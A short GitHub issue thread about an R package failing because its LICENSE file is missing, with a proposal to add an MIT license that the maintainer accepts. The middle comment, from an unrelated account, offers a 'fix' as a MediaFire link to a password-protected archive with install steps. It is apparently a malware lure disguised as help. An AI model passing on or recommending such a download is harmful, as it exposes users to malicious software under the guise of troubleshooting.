### ISSUE TITLE
License causing R package Error

### ISSUE THREAD

**Issue by parnikakhattri** [numbats/achievement-scraper#15]
Hi Michael, I noticed that R package is giving an error as we are missing the LICENSE file from package directory. Is it okay to add the license now? I was thinking basic MIT License to the package.

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MikeLydeamore** [comment]
Fine with me
